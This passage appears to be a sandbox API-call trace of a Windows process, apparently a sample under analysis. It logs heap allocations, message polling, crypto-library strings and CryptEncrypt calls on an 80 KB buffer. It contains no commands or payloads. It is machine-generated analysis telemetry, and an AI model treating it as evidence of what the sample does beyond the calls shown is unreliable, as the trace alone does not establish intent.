out: hHeap=0x8a0000) returned 1 [0198.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.004] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0198.005] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0198.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.005] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.005] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0198.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0198.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0198.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0198.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0198.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0198.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0198.009] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2748, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2748*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0198.009] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.009] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.010] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0198.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.010] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0198.010] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.010] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.010] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.010] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.010] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0198.010] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0198.011] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.011] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x139cc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x139d0) returned 1 [0198.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.012] CharLowerBuffW (in: lpsz="byte[80337]", cchLength=0xb | out: lpsz="byte[80337]") returned 0xb [0198.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.013] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.013] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.013] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa863b8*, pdwDataLen=0x87e820*=0x139cc, dwBufLen=0x139d0 | out: pbData=0xa863b8*, pdwDataLen=0x87e820*=0x139d0) returned 1 [0198.014] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.014] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 